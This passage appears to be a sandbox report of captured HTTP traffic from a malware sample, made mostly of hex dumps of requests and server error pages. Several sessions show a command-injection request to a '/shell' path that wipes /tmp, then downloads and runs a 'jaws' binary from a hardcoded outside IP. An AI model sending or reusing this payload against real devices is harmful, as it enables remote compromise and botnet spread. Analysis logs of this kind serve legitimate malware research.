6d 61 72 67 69 6e 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 20 64 69 76 2e 68 65 61 64 65 72 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 50 4d 41 41 41 46 6e 43 41 4d 41 41 41 42 45 71 49 2f 73 41 41 41 41 47 58 52 46 57 48 52 54 62 32 5a 30 64 32 46 79 5a 51 42 42 5a 47 39 69 5a 53 42 4a 62 57 46 6e 5a 56 4a 6c 59 57 52 35 63 63 6c 6c 50 41 41 41 41 79 46 70 56 46 68 30 57 45 31 4d 4f 6d 4e 76 62 53 35 68 5a 47 39 69 5a 53 35 34 62 58 41 41 41 41 41 41 41 44 77 2f 65 48 42 68 59 32 74 6c 64 43 42 69 5a 57 64 70 62 6a 30 69 37 37 75 2f 49 69 42 70 5a 44 30 69 56 7a 56 4e 4d 45 31 77 51 32 56 6f 61 55 68 36 63 6d 56 54 65 6b 35 55 59 33 70 72 59 7a 6c 6b 49 6a 38 2b 49 44 78 34 4f 6e 68 74 63 47 31 6c 64 47 45 67 65 47 31 73 62 6e 4d 36 65 44 30 69 59 57 52 76 59 6d 55 36 62 6e 4d 36 62 57 56 30 59 53 38 69 49 48 67 36 65 47 31 77 64 47 73 39 49 6b 46 6b 62 32 4a 6c 49 46 68 4e 55 43 42 44 62 33 4a 6c 49 44 55 75 4e 53 31 6a 4d 44 49 78 49 44 63 35 4c 6a 45 31 4e 44 6b 78 4d 53 77 67 4d 6a 41 78 4d 79 38 78 4d 43 38 79 4f 53 30 78 4d 54 6f 30 4e 7a 6f 78 4e 69 41 67 49 43 41 67 49 43 41 67 49 6a 34 67 50 48 4a 6b 5a 6a 70 53 52 45 59 67 65 47 31 73 62 6e 4d 36 63 6d 52 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 64 33 64 33 4c 6e 63 7a 4c 6d 39 79 5a 79 38 78 4f 54 6b 35 4c 7a 41 79 4c 7a 49 79 4c 58 4a 6b 5a 69 31 7a 65 57 35 30 59 58 67 74 62 6e 4d 6a 49 6a 34 67 50 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 42 79 5a 47 59 36 59 57 4a 76 64 58 51 39 49 69 49 67 65 47 31 73 62 6e 4d 36 65 47 31 77 54 55 30 39 49 6d 68 30 64 48 41 36 4c 79 39 75 63 79 35 68 5a 47 39 69 5a 53 35 6a 62 32 30 76 65 47 46 77 4c 7a 45 75 4d 43 39 74 62 53 38 69 49 48 68 74 62 47 35 7a 4f 6e 4e 30 55 6d 56 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 62 6e 4d 75 59 57 52 76 59 6d 55 75 59 32 39 74 4c 33 68 68 63 43 38 78 4c 6a 41 76 63 31 52 35 63 47 55 76 55 6d 56 7a 62 33 56 79 59 32 56 53 5a 57 59 6a 49 69 42 34 62 57 78 75 63 7a 70 34 62 58 41 39 49 6d 68 30 64 48 41 36 4c 79 39 75 63 79 35 68 5a 47 39 69 5a 53 35 6a 62 32 30 76 65 47 46 77 4c 7a 45 75 4d 43 38 69 49 48 68 74 63 45 31 4e 4f 6b
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd"><html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <style type="text/css"> html, body { margin: 0; padding: 0; font-family: Verdana, Arial, sans-serif; font-size: 10pt; background-color: #ffffff; } h1, h2 { height: 82px; text-indent: -999em; margin: 0; padding: 0; margin: 0; } div { margin: 0; padding: 0; } div.header { background: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPMAAAFnCAMAAABEqI/sAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAyFpVFh0WE1MOmNvbS5hZG9iZS54bXAAAAAAADw/eHBhY2tldCBiZWdpbj0i77u/IiBpZD0iVzVNME1wQ2VoaUh6cmVTek5UY3prYzlkIj8+IDx4OnhtcG1ldGEgeG1sbnM6eD0iYWRvYmU6bnM6bWV0YS8iIHg6eG1wdGs9IkFkb2JlIFhNUCBDb3JlIDUuNS1jMDIxIDc5LjE1NDkxMSwgMjAxMy8xMC8yOS0xMTo0NzoxNiAgICAgICAgIj4gPHJkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjIj4gPHJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtcE1NOk
                                                            Jan 26, 2024 15:32:22.010041952 CET1286INData Raw: 52 76 59 33 56 74 5a 57 35 30 53 55 51 39 49 6e 68 74 63 43 35 6b 61 57 51 36 4e 6b 4e 46 4e 44 46 47 52 6a 59 34 52 6a 41 35 4d 54 46 46 4e 45 45 78 4e 7a 46 45 4d 55 55 32 4d 7a 68 47 51 6a 42 44 4f 44 49 69 49 48 68 74 63 45 31 4e 4f 6b 6c 75
                                                            Data Ascii: RvY3VtZW50SUQ9InhtcC5kaWQ6NkNFNDFGRjY4RjA5MTFFNEExNzFEMUU2MzhGQjBDODIiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6NkNFNDFGRjU4RjA5MTFFNEExNzFEMUU2MzhGQjBDODIiIHhtcDpDcmVhdG9yVG9vbD0iQWRvYmUgUGhvdG9zaG9wIENDIChXaW5kb3dzKSI+IDx4bXBNTTpEZXJpdmVkRnJvbSBzd
                                                            Jan 26, 2024 15:32:22.010093927 CET1286INData Raw: 32 39 6e 65 72 61 36 72 6e 36 43 65 59 58 36 51 6e 72 33 53 41 4b 44 77 34 38 4f 32 47 70 36 33 53 6d 70 2b 37 48 77 74 78 38 6e 59 6b 38 50 62 71 56 59 34 43 5a 7a 6d 36 39 54 54 45 62 33 69 39 34 4d 5a 41 47 71 69 37 46 6c 44 6a 33 42 76 54 37
                                                            Data Ascii: 29nera6rn6CeYX6Qnr3SAKDw48O2Gp63Smp+7Hwtx8nYk8PbqVY4CZzm69TTEb3i94MZAGqi7FlDj3BvT7jAsrOxS53MAKTOIlBvvb68nZ6cp6imYGFfellb6rAE5ak9Hj9b4kojnsznzZ9X9AgK4L/CX2Be/cZl/MhG9lYg62lpACc9xMbDibXVkVBd02tdlpeV9OLYpJBl1tjVbGB68WUNzFo2tLWyt7m2/PHksrSx////H2U
                                                            Jan 26, 2024 15:32:22.010112047 CET190INData Raw: 30 61 6f 33 44 45 69 44 77 69 62 51 30 37 55 46 68 42 45 68 71 53 45 7a 51 69 6a 36 7a 67 76 44 64 63 53 71 45 4a 49 48 50 6d 77 74 39 77 4c 54 6c 39 32 64 33 41 37 70 65 68 70 37 73 6e 6c 71 47 6e 5a 61 52 75 44 54 66 65 4f 4c 47 46 35 4b 51 56
                                                            Data Ascii: 0ao3DEiDwibQ07UFhBEhqSEzQij6zgvDdcSqEJIHPmwt9wLTl92d3A7pehp7snlqGnZaRuDTfeOLGF5KQVkiNAqJ1M5sZLJEl1IjelZhvnvUAjv6Q6E+pxIcyJvvsRs2MGgm3tj55K7GRLSMQRGjnnfZ4EMjuIEObfbCMsIcwO7ulbY5BcWp21gHmcMGh5
                                                            Jan 26, 2024 15:32:22.010128975 CET1286INData Raw: 32 33 79 6f 54 4a 63 37 63 4e 6c 75 78 57 2f 76 72 79 42 54 51 66 5a 4d 64 43 79 51 61 71 47 44 54 45 34 55 77 68 64 35 4b 47 79 4e 42 6a 45 6a 6e 66 4f 6f 65 43 5a 30 62 6e 53 4a 54 43 52 6f 69 65 4b 4b 52 4b 46 77 49 66 4f 35 41 76 74 6c 30 48
                                                            Data Ascii: 23yoTJc7cNluxW/vryBTQfZMdCyQaqGDTE4Uwhd5KGyNBjEjnfOoeCZ0bnSJTCRoieKKRKFwIfO5Avtl0HmESEzffiR2iGWErwKY2AefNlXY8dsKAjKvceBoEqhcikRjt0NOkUMsdjjEBHoNdV6Y4kA/9hrs+DQkwgNi+hMcYonMLkGfixI6LofOI8TML1dp6elly5ARcgI2LRoSv9WoELMExSpTCdGb9DSVCeJIYJ8jVzM6L0y
                                                            Jan 26, 2024 15:32:22.010147095 CET1286INData Raw: 57 6d 34 4f 4f 50 34 61 4d 6d 4f 54 78 31 38 69 33 42 39 35 72 2f 7a 63 78 4d 2f 70 67 54 52 61 4f 35 34 74 61 4a 2b 31 33 69 52 78 2b 62 62 6a 4d 61 51 77 34 46 33 36 61 6a 42 2b 4a 33 76 34 50 50 48 77 33 6d 52 67 53 70 50 2f 6f 6f 6e 59 6f 45
                                                            Data Ascii: Wm4OOP4aMmOTx18i3B95r/zcxM/pgTRaO54taJ+13iRx+bbjMaQw4F36ajB+J3v4PPHw3mRgSpP/oonYoE3w82Gn+AMdLTaS844RW1Tpxgr063VyC/3SR8VZco0u29UXfjjbqUT0y36waZ9poG/VdoSpTrBCaTSQBjDxJ+YtorvxGkSdlLp9bp7hCa9t6q23v7JyYYTyDQmRJNn/xXJ7/R9IlgEJ30sq1DE0HnwcRtpts+HpwuN
                                                            Jan 26, 2024 15:32:22.010165930 CET1286INData Raw: 77 45 76 72 35 6d 31 2f 5a 77 79 77 4c 47 7a 67 31 52 77 41 76 6d 37 4c 51 61 4b 73 59 38 2f 52 5a 56 61 41 4c 6c 4a 4e 62 78 37 68 39 62 55 75 67 72 79 41 31 4d 6f 32 41 41 36 77 59 35 64 55 2b 59 31 55 54 4a 55 61 64 4c 51 64 51 33 4d 38 6b 2f
                                                            Data Ascii: wEvr5m1/ZwywLGzg1RwAvm7LQaKsY8/RZVaALlJNbx7h9bUugryA1Mo2AA6wY5dU+Y1UTJUadLQdQ3M8k/6NT63dztDmZDEGuLfPOzNAU9aR56gyg4zpdVTGyhAxBs51NpeXTJsJ/haUN09wQm6IHV9Fa63S6TuGZnu2AOJ52zHw8KH3jZ00ZTSwKWPvGjoS0kPqdQNorSN5jiazUqvX4stkOhXxLCIGeM75Mycuh7ez+sAffJq
                                                            Jan 26, 2024 15:32:22.010206938 CET1286INData Raw: 63 46 62 51 77 4b 54 58 76 47 4a 66 76 65 64 70 45 62 67 38 67 75 56 77 59 46 33 54 69 36 63 66 53 77 73 62 42 4b 2b 30 6d 4f 35 79 67 77 4b 79 67 74 55 4d 6b 47 54 54 62 6d 57 44 79 74 43 6e 33 41 31 71 4e 4c 6c 34 5a 67 68 78 2b 61 43 55 76 33
                                                            Data Ascii: cFbQwKTXvGJfvedpEbg8guVwYF3Ti6cfSwsbBK+0mO5ygwKygtUMkGTTbmWDytCn3A1qNLl4Zghx+aCUv3apqZEZrxrIEleyT6/hQJm4W887XXXjsJnms+WLWqsbFx9OihOaB0kxzPUWDWUx7drahkT1sMbcHSKioXW1cvWLp0McvYh5biQ9NA6Y6NXU5Bk/S1Ddpz2sanBoKSPToIzeYePayRqcs7P/9w9+7dz4BXH+xA0I2wd
                                                            Jan 26, 2024 15:32:22.010229111 CET1286INData Raw: 36 4a 66 6c 53 47 6c 43 4c 36 55 39 42 30 41 54 6c 6e 4d 66 42 72 37 72 50 6d 44 33 41 71 4f 68 54 35 30 36 64 57 37 7a 6c 31 49 47 6d 46 5a 5a 55 66 6a 35 64 58 50 6e 42 4a 6c 42 62 78 57 67 6d 50 58 64 5a 6c 62 6a 64 65 33 64 52 30 41 54 56 6a
                                                            Data Ascii: 6JflSGlCL6U9B0ATlnMfBr7rPmD3AqOhT506dW7zl1IGmFZZUfj5dXPnBJlBbxWgmPXdZlbjde3dR0ATVj2BY00dQUdEBsxH8JKZmkwp5Vl+EjZh9yHa+2hkxk6dOoSRGWAXxj5xHbtow0bsJEF77i6zimJ+CPTOuRNGsW1CU5O1PejIyOBb9EO34JzppJRn+b4VA7OGc4CHIgMvDo0fD5CxxC5GZUDt2nkdV+as7XH7CNpzd5l
                                                            Jan 26, 2024 15:32:22.010246992 CET1286INData Raw: 4b 34 6c 57 34 4e 34 37 6e 62 7a 43 70 71 49 58 30 79 76 71 41 54 35 49 4b 43 70 49 4b 6b 45 4f 68 6d 4e 6e 4e 53 61 54 38 76 5a 6a 62 41 61 34 43 55 5a 78 2f 35 31 50 72 6e 4e 77 65 4a 6f 63 71 67 65 7a 4c 6a 59 76 30 61 48 47 71 47 6a 61 35 44
                                                            Data Ascii: K4lW4N47nbzCpqIX0yvqAT5IKCpIKkEOhmNnNSaT8vZjbAa4CUZx/51PrnNweJocqgezLjYv0aHGqGja5DoTfE7aKKtiEK1wClemqjDvdRduHOjYAMr3EmhUGHFG3szAB/S6M8+8A36DMs5t+DekwBFxYDZkD8eHvIdCJYtIOeu82ssNuRMz+ncM+XRkCGV7zCoHOzWUWb9CNfdgm6b4jyLKthCZ2V5fHQwMDglT5Qlzsu2TkD4


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            425192.168.2.2334724217.243.251.11180
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.810147047 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:22.028356075 CET40INHTTP/1.1 400 Bad Request


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            426192.168.2.2354690213.183.59.24480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.865407944 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            427192.168.2.234645683.240.212.19480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.868638992 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:22.104109049 CET502INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:21 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            428192.168.2.235627261.195.145.6580
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:21.950680017 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            429192.168.2.233405043.140.208.18880
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:22.048779964 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 93.123.85.149/jaws;sh+/tmp/jaws HTTP/1.1
                                                            User-Agent: Hello, world
                                                            Host: 127.0.0.1:80
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                            Connection: keep-alive
                                                            Jan 26, 2024 15:32:22.372617006 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Fri, 26 Jan 2024 14:32:21 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            430192.168.2.234124638.177.55.13480
                                                            TimestampBytes transferredDirectionData
                                                            Jan 26, 2024 15:32:22.560236931 CET16OUTGET
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jan 26, 2024 15:32:22.848483086 CET44OUTData Raw: 2f 73 68 65 6c 6c 3f 63 64 2b 2f 74 6d 70 3b 72 6d 2b 2d 72 66 2b 2a 3b 77 67 65 74 2b 20 39 33
                                                            Data Ascii: /shell?cd+/tmp;rm+-rf+*;wget+ 93
                                                            Jan 26, 2024 15:32:22.848484039 CET48OUTData Raw: 2e 31 32 33 2e 38 35 2e 31 34 39 2f 6a 61 77 73 3b 73 68 2b 2f 74 6d 70 2f 6a 61 77 73 20 48 54 54 50 2f 31
                                                            Data Ascii: .123.85.149/jaws;sh+/tmp/jaws HTTP/1
                                                            Jan 26, 2024 15:32:22.848515987 CET48OUTData Raw: 2e 31 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 48 65 6c 6c 6f 2c 20 77 6f 72 6c 64 0d 0a 48 6f 73 74 3a 20
                                                            Data Ascii: .1User-Agent: Hello, worldHost:
                                                            Jan 26, 2024 15:32:22.848515987 CET48OUTData Raw: 31 32 37 2e 30 2e 30 2e 31 3a 38 30 0d 0a 41 63 63 65 70 74 3a 20 74 65 78 74 2f 68 74 6d 6c 2c 61 70 70 6c
                                                            Data Ascii: 127.0.0.1:80Accept: text/html,appl
                                                            Jan 26, 2024 15:32:22.848515987 CET48OUTData Raw: 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 2c 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 6d 6c 3b 71 3d
                                                            Data Ascii: ication/xhtml+xml,application/xml;q=
                                                            Jan 26, 2024 15:32:22.848541975 CET48OUTData Raw: 30 2e 39 2c 69 6d 61 67 65 2f 77 65 62 70 2c 2a 2f 2a 3b 71 3d 30 2e 38 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e
                                                            Data Ascii: 0.9,image/webp,*/*;q=0.8Connection
                                                            Jan 26, 2024 15:32:22.848548889 CET28OUTData Raw: 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a
                                                            Data Ascii: : keep-alive
                                                            Jan 26, 2024 15:32:23.138808012 CET1286INHTTP/1.1 400 Bad Request
                                                            Date: Fri, 26 Jan 2024 14:32:22 GMT
                                                            Content-Type: text/html;charset=utf-8
                                                            Connection: close
                                                            ETag: "657811ff-fde"
                                                            Server: Hello world
                                                            Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e e8 af b7 e6 b1 82 e6 97 a0 e6 95 88 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 2c 20 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 36 34 2c 36 34 2c 36 34 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 29 29 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 20 20 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 67 72 61 79 73 63 61 6c 65 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 7d 0a 2a 20 7b 0a 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72
                                                            Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title></title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><style>*, body, html { margin: 0; padding: 0;}body, html { --text-opacity: 1; color: #404040; color: rgba(64,64,64,var(--text-opacity)); -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; font-family: system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji; font-size: 16px;}* { box-sizing: border
                                                            Jan 26, 2024 15:32:23.139153004 CET1286INData Raw: 2d 62 6f 78 3b 0a 7d 0a 68 74 6d 6c 5b 41 74 74 72 69 62 75 74 65 73 20 53 74 79 6c 65 5d 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6c 6f 63 61 6c 65 3a 20 22 65 6e 2d 55 53 22 3b 0a 7d 0a 2e 70 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67
